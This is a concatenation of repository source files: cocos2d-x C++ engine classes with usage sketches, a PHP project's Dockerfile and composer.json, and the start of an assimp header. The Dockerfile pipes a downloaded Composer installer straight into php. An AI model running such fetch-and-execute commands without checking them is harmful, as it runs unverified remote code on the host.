, m_fAngleX(0.0)
, m_fDeltaAngleX(0.0)
, m_fRadZ(0.0)
, m_fRadDeltaZ(0.0)
, m_fRadX(0.0)
, m_fRadDeltaX(0.0)
{}
~CCOrbitCamera(){}
/** creates a CCOrbitCamera action with radius, delta-radius, z, deltaZ, x, deltaX
@deprecated: This interface will be deprecated sooner or later.
*/
CC_DEPRECATED_ATTRIBUTE static CCOrbitCamera* actionWithDuration(float t, float radius, float deltaRadius, float angleZ, float deltaAngleZ, float angleX, float deltaAngleX);
/** creates a CCOrbitCamera action with radius, delta-radius, z, deltaZ, x, deltaX */
static CCOrbitCamera* create(float t, float radius, float deltaRadius, float angleZ, float deltaAngleZ, float angleX, float deltaAngleX);
/** initializes a CCOrbitCamera action with radius, delta-radius, z, deltaZ, x, deltaX */
bool initWithDuration(float t, float radius, float deltaRadius, float angleZ, float deltaAngleZ, float angleX, float deltaAngleX);
/** positions the camera according to spherical coordinates */
void sphericalRadius(float *r, float *zenith, float *azimuth);
// super methods
virtual CCObject* copyWithZone(CCZone* pZone);
virtual void startWithTarget(CCNode *pTarget);
virtual void update(float time);
protected:
float m_fRadius;
float m_fDeltaRadius;
float m_fAngleZ;
float m_fDeltaAngleZ;
float m_fAngleX;
float m_fDeltaAngleX;
float m_fRadZ;
float m_fRadDeltaZ;
float m_fRadX;
float m_fRadDeltaX;
};
// end of actions group
/// @}
NS_CC_END
#endif //__CCCAMERA_ACTION_H__
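// ---------------------------------------------------------------------------
// Illustrative usage sketch (not part of the original header). It shows how a
// CCOrbitCamera built with the factory declared above is typically attached to
// a node. The include path, the `pLayer` parameter and the concrete angle
// values are assumptions made for this example only.
#include "base_nodes/CCNode.h" // assumed cocos2d-x 2.x location of CCNode

static void runOrbitCameraSketch(cocos2d::CCNode* pLayer)
{
    using namespace cocos2d;
    // orbit for 2 seconds at radius 1, sweeping 180 degrees around the Z axis
    CCOrbitCamera* orbit = CCOrbitCamera::create(2.0f,   // duration
                                                 1.0f,   // radius
                                                 0.0f,   // delta radius
                                                 0.0f,   // angle Z
                                                 180.0f, // delta angle Z
                                                 0.0f,   // angle X
                                                 0.0f);  // delta angle X
    pLayer->runAction(orbit);
}
// ---------------------------------------------------------------------------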
<|start_filename|>cocos2dx/actions/CCActionProgressTimer.h<|end_filename|>
/****************************************************************************
Copyright (c) 2010-2012 cocos2d-x.org
Copyright (C) 2010 <NAME>
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#ifndef __ACTION_CCPROGRESS_TIMER_H__
#define __ACTION_CCPROGRESS_TIMER_H__
#include "CCActionInterval.h"
NS_CC_BEGIN
/**
* @addtogroup actions
* @{
*/
/**
@brief Progress to percentage
@since v0.99.1
*/
class CC_DLL CCProgressTo : public CCActionInterval
{
public:
/** Initializes with a duration and a percent */
bool initWithDuration(float duration, float fPercent);
virtual CCObject* copyWithZone(CCZone *pZone);
virtual void startWithTarget(CCNode *pTarget);
virtual void update(float time);
public:
/** Creates and initializes with a duration and a percent
@deprecated: This interface will be deprecated sooner or later.
*/
CC_DEPRECATED_ATTRIBUTE static CCProgressTo* actionWithDuration(float duration, float fPercent);
/** Creates and initializes with a duration and a percent */
static CCProgressTo* create(float duration, float fPercent);
protected:
float m_fTo;
float m_fFrom;
};
/**
@brief Progress from a percentage to another percentage
@since v0.99.1
*/
class CC_DLL CCProgressFromTo : public CCActionInterval
{
public:
/** Initializes the action with a duration, a "from" percentage and a "to" percentage */
bool initWithDuration(float duration, float fFromPercentage, float fToPercentage);
virtual CCObject* copyWithZone(CCZone *pZone);
virtual CCActionInterval* reverse(void);
virtual void startWithTarget(CCNode *pTarget);
virtual void update(float time);
public:
/** Creates and initializes the action with a duration, a "from" percentage and a "to" percentage
@deprecated: This interface will be deprecated sooner or later.
*/
CC_DEPRECATED_ATTRIBUTE static CCProgressFromTo* actionWithDuration(float duration, float fFromPercentage, float fToPercentage);
/** Creates and initializes the action with a duration, a "from" percentage and a "to" percentage */
static CCProgressFromTo* create(float duration, float fFromPercentage, float fToPercentage);
protected:
float m_fTo;
float m_fFrom;
};
// end of actions group
/// @}
NS_CC_END
#endif // __ACTION_CCPROGRESS_TIMER_H__
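// ---------------------------------------------------------------------------
// Illustrative usage sketch (not part of the original header). CCProgressTo
// and CCProgressFromTo are normally run on a CCProgressTimer node; the include
// path, the `pTimer` parameter and the percentages below are assumptions made
// for this example only.
#include "misc_nodes/CCProgressTimer.h" // assumed cocos2d-x 2.x location

static void runProgressSketch(cocos2d::CCProgressTimer* pTimer)
{
    using namespace cocos2d;
    // animate the timer from its current percentage up to 100% in 2 seconds
    pTimer->runAction(CCProgressTo::create(2.0f, 100.0f));
    // alternatively, animate explicitly from 0% to 80% over 1.5 seconds:
    // pTimer->runAction(CCProgressFromTo::create(1.5f, 0.0f, 80.0f));
}
// ---------------------------------------------------------------------------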
<|start_filename|>cocos2dx/sprite_nodes/CCAnimation.cpp<|end_filename|>
/****************************************************************************
Copyright (c) 2010-2012 cocos2d-x.org
Copyright (c) 2008-2010 <NAME>
Copyright (c) 2011 Zynga Inc.
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#include "CCAnimation.h"
#include "textures/CCTextureCache.h"
#include "textures/CCTexture2D.h"
#include "ccMacros.h"
#include "sprite_nodes/CCSpriteFrame.h"
#include "cocoa/CCZone.h"
NS_CC_BEGIN
CCAnimationFrame::CCAnimationFrame()
: m_pSpriteFrame(NULL)
, m_fDelayUnits(0.0f)
, m_pUserInfo(NULL)
{
}
bool CCAnimationFrame::initWithSpriteFrame(CCSpriteFrame* spriteFrame, float delayUnits, CCDictionary* userInfo)
{
setSpriteFrame(spriteFrame);
setDelayUnits(delayUnits);
setUserInfo(userInfo);
return true;
}
CCAnimationFrame::~CCAnimationFrame()
{
CCLOGINFO( "cocos2d: deallocing %s", this);
CC_SAFE_RELEASE(m_pSpriteFrame);
CC_SAFE_RELEASE(m_pUserInfo);
}
CCObject* CCAnimationFrame::copyWithZone(CCZone* pZone)
{
CCZone* pNewZone = NULL;
CCAnimationFrame* pCopy = NULL;
if(pZone && pZone->m_pCopyObject)
{
//in case of being called at sub class
pCopy = (CCAnimationFrame*)(pZone->m_pCopyObject);
}
else
{
pCopy = new CCAnimationFrame();
pNewZone = new CCZone(pCopy);
}
pCopy->initWithSpriteFrame((CCSpriteFrame*)m_pSpriteFrame->copy()->autorelease(),
m_fDelayUnits, m_pUserInfo != NULL ? (CCDictionary*)m_pUserInfo->copy()->autorelease() : NULL);
CC_SAFE_DELETE(pNewZone);
return pCopy;
}
// implementation of CCAnimation
CCAnimation* CCAnimation::animation(void)
{
return CCAnimation::create();
}
CCAnimation* CCAnimation::create(void)
{
CCAnimation *pAnimation = new CCAnimation();
pAnimation->init();
pAnimation->autorelease();
return pAnimation;
}
CCAnimation* CCAnimation::animationWithSpriteFrames(CCArray *frames, float delay/* = 0.0f*/)
{
return CCAnimation::createWithSpriteFrames(frames, delay);
}
CCAnimation* CCAnimation::createWithSpriteFrames(CCArray *frames, float delay/* = 0.0f*/)
{
CCAnimation *pAnimation = new CCAnimation();
pAnimation->initWithSpriteFrames(frames, delay);
pAnimation->autorelease();
return pAnimation;
}
CCAnimation* CCAnimation::animationWithAnimationFrames(CCArray* arrayOfAnimationFrameNames, float delayPerUnit, unsigned int loops)
{
return CCAnimation::create(arrayOfAnimationFrameNames, delayPerUnit, loops);
}
CCAnimation* CCAnimation::create(CCArray* arrayOfAnimationFrameNames, float delayPerUnit, unsigned int loops)
{
CCAnimation *pAnimation = new CCAnimation();
pAnimation->initWithAnimationFrames(arrayOfAnimationFrameNames, delayPerUnit, loops);
pAnimation->autorelease();
return pAnimation;
}
bool CCAnimation::init()
{
return initWithSpriteFrames(NULL, 0.0f);
}
bool CCAnimation::initWithSpriteFrames(CCArray *pFrames, float delay/* = 0.0f*/)
{
CCARRAY_VERIFY_TYPE(pFrames, CCSpriteFrame*);
m_uLoops = 1;
m_fDelayPerUnit = delay;
CCArray* pTmpFrames = CCArray::create();
setFrames(pTmpFrames);
if (pFrames != NULL)
{
CCObject* pObj = NULL;
CCARRAY_FOREACH(pFrames, pObj)
{
CCSpriteFrame* frame = (CCSpriteFrame*)pObj;
CCAnimationFrame *animFrame = new CCAnimationFrame();
animFrame->initWithSpriteFrame(frame, 1, NULL);
m_pFrames->addObject(animFrame);
animFrame->release();
m_fTotalDelayUnits++;
}
}
return true;
}
bool CCAnimation::initWithAnimationFrames(CCArray* arrayOfAnimationFrames, float delayPerUnit, unsigned int loops)
{
CCARRAY_VERIFY_TYPE(arrayOfAnimationFrames, CCAnimationFrame*);
m_fDelayPerUnit = delayPerUnit;
m_uLoops = loops;
setFrames(CCArray::createWithArray(arrayOfAnimationFrames));
CCObject* pObj = NULL;
CCARRAY_FOREACH(m_pFrames, pObj)
{
CCAnimationFrame* animFrame = (CCAnimationFrame*)pObj;
m_fTotalDelayUnits += animFrame->getDelayUnits();
}
return true;
}
CCAnimation::CCAnimation()
: m_fTotalDelayUnits(0.0f)
, m_fDelayPerUnit(0.0f)
, m_fDuration(0.0f)
, m_pFrames(NULL)
, m_bRestoreOriginalFrame(false)
, m_uLoops(0)
{
}
CCAnimation::~CCAnimation(void)
{
CCLOGINFO("cocos2d, deallocing %p", this);
CC_SAFE_RELEASE(m_pFrames);
}
void CCAnimation::addSpriteFrame(CCSpriteFrame *pFrame)
{
CCAnimationFrame *animFrame = new CCAnimationFrame();
animFrame->initWithSpriteFrame(pFrame, 1.0f, NULL);
m_pFrames->addObject(animFrame);
animFrame->release();
// update duration
m_fTotalDelayUnits++;
}
void CCAnimation::addSpriteFrameWithFileName(const char *pszFileName)
{
CCTexture2D *pTexture = CCTextureCache::sharedTextureCache()->addImage(pszFileName);
CCRect rect = CCRectZero;
rect.size = pTexture->getContentSize();
CCSpriteFrame *pFrame = CCSpriteFrame::createWithTexture(pTexture, rect);
addSpriteFrame(pFrame);
}
void CCAnimation::addSpriteFrameWithTexture(CCTexture2D *pobTexture, const CCRect& rect)
{
CCSpriteFrame *pFrame = CCSpriteFrame::createWithTexture(pobTexture, rect);
addSpriteFrame(pFrame);
}
float CCAnimation::getDuration(void)
{
return m_fTotalDelayUnits * m_fDelayPerUnit;
}
CCObject* CCAnimation::copyWithZone(CCZone* pZone)
{
CCZone* pNewZone = NULL;
CCAnimation* pCopy = NULL;
if(pZone && pZone->m_pCopyObject)
{
//in case of being called at sub class
pCopy = (CCAnimation*)(pZone->m_pCopyObject);
}
else
{
pCopy = new CCAnimation();
pNewZone = new CCZone(pCopy);
}
pCopy->initWithAnimationFrames(m_pFrames, m_fDelayPerUnit, m_uLoops);
pCopy->setRestoreOriginalFrame(m_bRestoreOriginalFrame);
CC_SAFE_DELETE(pNewZone);
return pCopy;
}
NS_CC_END
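// ---------------------------------------------------------------------------
// Illustrative usage sketch (not part of the original source). It exercises
// the factory and frame helpers implemented above; the asset file names and
// the chosen delay are assumptions made for this example only.
static cocos2d::CCAnimation* buildWalkAnimationSketch()
{
    using namespace cocos2d;
    CCAnimation* animation = CCAnimation::create();
    animation->addSpriteFrameWithFileName("walk_0.png"); // hypothetical asset
    animation->addSpriteFrameWithFileName("walk_1.png"); // hypothetical asset
    animation->setDelayPerUnit(0.1f);         // synthesized setter from CCAnimation.h
    animation->setRestoreOriginalFrame(true); // jump back to the first frame when done
    return animation; // autoreleased, typically wrapped in a CCAnimate action
}
// ---------------------------------------------------------------------------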
<|start_filename|>cocos2dx/layers_scenes_transitions_nodes/CCTransitionPageTurn.cpp<|end_filename|>
/****************************************************************************
Copyright (c) 2010-2012 cocos2d-x.org
Copyright (c) 2009 Sindesso Pty Ltd http://www.sindesso.com/
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#include "CCTransitionPageTurn.h"
#include "CCDirector.h"
#include "actions/CCActionInterval.h"
#include "actions/CCActionInstant.h"
#include "actions/CCActionGrid.h"
#include "actions/CCActionPageTurn3D.h"
NS_CC_BEGIN
CCTransitionPageTurn::CCTransitionPageTurn()
{
}
CCTransitionPageTurn::~CCTransitionPageTurn()
{
}
CCTransitionPageTurn * CCTransitionPageTurn::transitionWithDuration(float t, CCScene *scene, bool backwards)
{
return CCTransitionPageTurn::create(t,scene,backwards);
}
/** creates a base transition with duration and incoming scene */
CCTransitionPageTurn * CCTransitionPageTurn::create(float t, CCScene *scene, bool backwards)
{
CCTransitionPageTurn * pTransition = new CCTransitionPageTurn();
pTransition->initWithDuration(t,scene,backwards);
pTransition->autorelease();
return pTransition;
}
/** initializes a transition with duration and incoming scene */
bool CCTransitionPageTurn::initWithDuration(float t, CCScene *scene, bool backwards)
{
// XXX: needed before [super init]
m_bBack = backwards;
if( CCTransitionScene::initWithDuration(t, scene) )
{
// do something
}
return true;
}
void CCTransitionPageTurn::sceneOrder()
{
m_bIsInSceneOnTop = m_bBack;
}
void CCTransitionPageTurn::onEnter()
{
CCTransitionScene::onEnter();
CCSize s = CCDirector::sharedDirector()->getWinSize();
int x,y;
if( s.width > s.height)
{
x=16;
y=12;
}
else
{
x=12;
y=16;
}
CCActionInterval *action = this->actionWithSize(ccg(x,y));
if(! m_bBack )
{
m_pOutScene->runAction
(
CCSequence::create
(
action,
CCCallFunc::create(this, callfunc_selector(CCTransitionScene::finish)),
CCStopGrid::create(),
NULL
)
);
}
else
{
// to prevent initial flicker
m_pInScene->setVisible(false);
m_pInScene->runAction
(
CCSequence::create
(
CCShow::create(),
action,
CCCallFunc::create(this, callfunc_selector(CCTransitionScene::finish)),
CCStopGrid::create(),
NULL
)
);
}
}
CCActionInterval* CCTransitionPageTurn:: actionWithSize(const ccGridSize& vector)
{
if( m_bBack )
{
// Get hold of the PageTurn3DAction
return CCReverseTime::create
(
CCPageTurn3D::create(vector, m_fDuration)
);
}
else
{
// Get hold of the PageTurn3DAction
return CCPageTurn3D::create(vector, m_fDuration);
}
}
NS_CC_END
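// ---------------------------------------------------------------------------
// Illustrative usage sketch (not part of the original source). It shows the
// typical hand-off of a page-turn transition to the director; `nextScene` and
// the use of CCDirector::replaceScene are assumptions made for this example.
static void replaceSceneWithPageTurnSketch(cocos2d::CCScene* nextScene)
{
    using namespace cocos2d;
    // 1.2 second forward page turn revealing the incoming scene
    CCTransitionPageTurn* transition = CCTransitionPageTurn::create(1.2f, nextScene, false);
    CCDirector::sharedDirector()->replaceScene(transition);
}
// ---------------------------------------------------------------------------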
<|start_filename|>cocos2dx/actions/CCActionTween.cpp<|end_filename|>
/****************************************************************************
Copyright (c) 2010-2012 cocos2d-x.org
Copyright 2009 lhunath (<NAME>)
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#include "CCActionTween.h"
NS_CC_BEGIN
CCActionTween* CCActionTween::actionWithDuration(float aDuration, const char* key, float from, float to)
{
return CCActionTween::create(aDuration, key, from, to);
}
CCActionTween* CCActionTween::create(float aDuration, const char* key, float from, float to)
{
CCActionTween* pRet = new CCActionTween();
if (pRet && pRet->initWithDuration(aDuration, key, from, to))
{
pRet->autorelease();
}
else
{
CC_SAFE_DELETE(pRet);
}
return pRet;
}
bool CCActionTween::initWithDuration(float aDuration, const char* key, float from, float to)
{
if (CCActionInterval::initWithDuration(aDuration))
{
m_strKey = key;
m_fTo = to;
m_fFrom = from;
return true;
}
return false;
}
void CCActionTween::startWithTarget(CCNode *pTarget)
{
CCAssert(dynamic_cast<CCActionTweenDelegate*>(pTarget), "target must implement CCActionTweenDelegate");
CCActionInterval::startWithTarget(pTarget);
m_fDelta = m_fTo - m_fFrom;
}
void CCActionTween::update(float dt)
{
dynamic_cast<CCActionTweenDelegate*>(m_pTarget)->updateTweenAction(m_fTo - m_fDelta * (1 - dt), m_strKey.c_str());
}
CCActionInterval* CCActionTween::reverse()
{
return CCActionTween::create(m_fDuration, m_strKey.c_str(), m_fTo, m_fFrom);
}
NS_CC_END
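// ---------------------------------------------------------------------------
// Illustrative usage sketch (not part of the original source). As asserted in
// startWithTarget() above, the target must implement CCActionTweenDelegate.
// The MyTweenNodeSketch class, the include path and the "rotation" key are
// assumptions made for this example only.
#include "base_nodes/CCNode.h" // assumed cocos2d-x 2.x location of CCNode

class MyTweenNodeSketch : public cocos2d::CCNode, public cocos2d::CCActionTweenDelegate
{
public:
    // receives the interpolated value for the tweened key on every update
    virtual void updateTweenAction(float value, const char* key)
    {
        (void)key; // a real node would dispatch on the key name
        this->setRotation(value);
    }
};

// tween the "rotation" key from 0 to 90 degrees over 2 seconds:
// pNode->runAction(cocos2d::CCActionTween::create(2.0f, "rotation", 0.0f, 90.0f));
// ---------------------------------------------------------------------------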
<|start_filename|>cocos2dx/cocoa/CCString.cpp<|end_filename|>
#include "CCString.h"
#include "platform/CCFileUtils.h"
#include "ccMacros.h"
#include <stdlib.h>
#include <stdio.h>
NS_CC_BEGIN
#define kMaxStringLen (1024*100)
CCString::CCString()
:m_sString("")
{}
CCString::CCString(const char * str)
:m_sString(str)
{}
CCString::CCString(const std::string& str)
:m_sString(str)
{}
CCString::CCString(const CCString& str)
:m_sString(str.getCString())
{}
CCString::~CCString()
{
m_sString.clear();
}
CCString& CCString::operator= (const CCString& other)
{
m_sString = other.m_sString;
return *this;
}
bool CCString::initWithFormatAndValist(const char* format, va_list ap)
{
bool bRet = false;
char* pBuf = (char*)malloc(kMaxStringLen);
if (pBuf != NULL)
{
vsnprintf(pBuf, kMaxStringLen, format, ap);
m_sString = pBuf;
free(pBuf);
bRet = true;
}
return bRet;
}
bool CCString::initWithFormat(const char* format, ...)
{
bool bRet = false;
m_sString.clear();
va_list ap;
va_start(ap, format);
bRet = initWithFormatAndValist(format, ap);
va_end(ap);
return bRet;
}
int CCString::intValue() const
{
if (length() == 0)
{
return 0;
}
return atoi(m_sString.c_str());
}
unsigned int CCString::uintValue() const
{
if (length() == 0)
{
return 0;
}
return (unsigned int)atoi(m_sString.c_str());
}
float CCString::floatValue() const
{
if (length() == 0)
{
return 0.0f;
}
return (float)atof(m_sString.c_str());
}
double CCString::doubleValue() const
{
if (length() == 0)
{
return 0.0;
}
return atof(m_sString.c_str());
}
bool CCString::boolValue() const
{
if (length() == 0)
{
return false;
}
if (0 == strcmp(m_sString.c_str(), "0") || 0 == strcmp(m_sString.c_str(), "false"))
{
return false;
}
return true;
}
const char* CCString::getCString() const
{
return m_sString.c_str();
}
unsigned int CCString::length() const
{
return m_sString.length();
}
int CCString::compare(const char * pStr) const
{
return strcmp(getCString(), pStr);
}
CCObject* CCString::copyWithZone(CCZone* pZone)
{
CCAssert(pZone == NULL, "CCString should not be inherited.");
CCString* pStr = new CCString(m_sString.c_str());
return pStr;
}
bool CCString::isEqual(const CCObject* pObject)
{
bool bRet = false;
const CCString* pStr = dynamic_cast<const CCString*>(pObject);
if (pStr != NULL)
{
if (0 == m_sString.compare(pStr->m_sString))
{
bRet = true;
}
}
return bRet;
}
CCString* CCString::stringWithCString(const char* pStr)
{
return CCString::create(pStr);
}
CCString* CCString::create(const std::string& str)
{
CCString* pRet = new CCString(str);
pRet->autorelease();
return pRet;
}
CCString* CCString::stringWithString(const std::string& pStr)
{
CCString* pRet = new CCString(pStr);
pRet->autorelease();
return pRet;
}
CCString* CCString::stringWithData(const unsigned char* pData, unsigned long nLen)
{
return CCString::createWithData(pData, nLen);
}
CCString* CCString::createWithData(const unsigned char* pData, unsigned long nLen)
{
CCString* pRet = NULL;
if (pData != NULL)
{
char* pStr = (char*)malloc(nLen+1);
if (pStr != NULL)
{
pStr[nLen] = '\0';
if (nLen > 0)
{
memcpy(pStr, pData, nLen);
}
pRet = CCString::create(pStr);
free(pStr);
}
}
return pRet;
}
CCString* CCString::stringWithFormat(const char* format, ...)
{
CCString* pRet = CCString::create("");
va_list ap;
va_start(ap, format);
pRet->initWithFormatAndValist(format, ap);
va_end(ap);
return pRet;
}
CCString* CCString::createWithFormat(const char* format, ...)
{
CCString* pRet = CCString::create("");
va_list ap;
va_start(ap, format);
pRet->initWithFormatAndValist(format, ap);
va_end(ap);
return pRet;
}
CCString* CCString::stringWithContentsOfFile(const char* pszFileName)
{
return CCString::createWithContentsOfFile(pszFileName);
}
CCString* CCString::createWithContentsOfFile(const char* pszFileName)
{
unsigned long size = 0;
unsigned char* pData = 0;
CCString* pRet = NULL;
pData = CCFileUtils::sharedFileUtils()->getFileData(pszFileName, "rb", &size);
pRet = CCString::createWithData(pData, size);
CC_SAFE_DELETE_ARRAY(pData);
return pRet;
}
NS_CC_END
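// ---------------------------------------------------------------------------
// Illustrative usage sketch (not part of the original source). It exercises
// the factory and conversion helpers implemented above; the literal values are
// assumptions made for this example only.
static void ccStringSketch()
{
    using namespace cocos2d;
    // printf-style construction; the result is autoreleased
    CCString* score = CCString::createWithFormat("score: %d", 42);
    const char* text = score->getCString();                 // "score: 42"
    // numeric and boolean conversions
    bool enabled = CCString::create("false")->boolValue();  // false
    int count    = CCString::create("17")->intValue();      // 17
    (void)text; (void)enabled; (void)count;
}
// ---------------------------------------------------------------------------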
<|start_filename|>cocos2dx/cocoa/CCInteger.h<|end_filename|>
#ifndef __CCINTEGER_H__
#define __CCINTEGER_H__
#include "CCObject.h"
NS_CC_BEGIN
/**
* @addtogroup data_structures
* @{
*/
class CC_DLL CCInteger : public CCObject
{
public:
CCInteger(int v)
: m_nValue(v) {}
int getValue() const {return m_nValue;}
// @deprecated: This interface will be deprecated sooner or later.
CC_DEPRECATED_ATTRIBUTE static CCInteger* integerWithInt(int v)
{
return CCInteger::create(v);
}
static CCInteger* create(int v)
{
CCInteger* pRet = new CCInteger(v);
pRet->autorelease();
return pRet;
}
private:
int m_nValue;
};
// end of data_structure group
/// @}
NS_CC_END
#endif /* __CCINTEGER_H__ */
| nickflink/cocos2d-x |
<|start_filename|>infra/docker/Dockerfile<|end_filename|>
FROM php:7.0-apache
# Set default system timezone
RUN ln -sf /usr/share/zoneinfo/Europe/Paris /etc/localtime
# Install latest updates and PHP extensions
RUN apt-get update && apt-get install -y --no-install-recommends \
vim \
bzip2 \
zip \
unzip \
libbz2-dev \
libmcrypt-dev \
libicu-dev \
&& docker-php-ext-configure mysqli \
&& docker-php-ext-install mysqli pdo_mysql bz2 mcrypt intl \
&& rm -rf /var/lib/apt/lists/*
# Install composer
RUN curl -sS https://getcomposer.org/installer | php \
&& mv composer.phar /usr/bin/composer
# Enable Apache Rewrite module
RUN a2enmod rewrite
# Default Vhost for development
COPY infra/docker/vhost.conf /etc/apache2/sites-available/000-default.conf
# Copy application sources into the image
WORKDIR /var/app
COPY . /var/app/
# htaccess specific to docker app
COPY infra/docker/.htaccess public/
# Update project
RUN /usr/bin/composer install --no-dev \
&& ./scripts/post-create-project \
&& chown www-data:www-data -R .
COPY infra/docker/entrypoint.sh /
ENTRYPOINT ["/entrypoint.sh", "apache2-foreground"]
<|start_filename|>composer.json<|end_filename|>
{
"name": "continuousphp/deploy-agent",
"homepage": "https://github.com/continuousphp/deploy-agent",
"description": "Deploy agent for continuousphp",
"type": "project",
"keywords": [
"build",
"tool",
"continuousphp",
"deployment",
"agent"
],
"license": "Apache-2.0",
"support": {
"email": "<EMAIL>",
"source": "https://github.com/continuousphp/deploy-agent",
"issues": "https://github.com/continuousphp/deploy-agent/issues"
},
"config": {
"process-timeout": 5000
},
"require": {
"php": ">=5.5.0",
"ext-pdo_sqlite": "*",
"zendframework/zendframework": "2.5.2",
"doctrine/doctrine-orm-module": "~0.10",
"reprovinci/doctrine-encrypt": "~3.0",
"bushbaby/flysystem": "~1.0",
"continuousphp/sdk": "~0.3"
},
"require-dev": {
"phpunit/phpunit": "4.1.*",
"mikey179/vfsStream": "1.3.*@dev",
"squizlabs/php_codesniffer": "^2.3",
"behat/behat": "^3.0"
},
"autoload": {
"psr-4": {
"Continuous\\DeployAgent\\": "module/DeployAgent/src"
},
"classmap": [
"module/DeployAgent/Module.php"
]
},
"autoload-dev": {
"psr-4": {
"Continuous\\Features\\": "features/bootstrap/"
}
},
"scripts": {
"post-create-project-cmd": "scripts/post-create-project"
}
}
| continuousdemo/deploy-agent |
<|start_filename|>src/Ordering/Ordering.API/Mapping/OrderMapping.cs<|end_filename|>
using AutoMapper;
using EventBusRabbitMQ.Events;
using Ordering.Application.Commands;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
namespace Ordering.API.Mapping
{
public class OrderMapping : Profile
{
public OrderMapping()
{
CreateMap<BasketCheckoutEvent, CheckoutOrderCommand>().ReverseMap();
}
}
}
| jerysun/microshop |
<|start_filename|>assimp/code/Q3BSPFileParser.h<|end_filename|>
/*
Open Asset Import Library (assimp)
----------------------------------------------------------------------
Copyright (c) 2006-2016, assimp team
All rights reserved.
Redistribution and use of this software in source and binary forms,
with or without modification, are permitted provided that the
following conditions are met:
* Redistributions of source code must retain the above
copyright notice, this list of conditions and the
following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other
materials provided with the distribution.
* Neither the name of the assimp team, nor the names of its
contributors may be used to endorse or promote products
derived from this software without specific prior
written permission of the assimp team.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
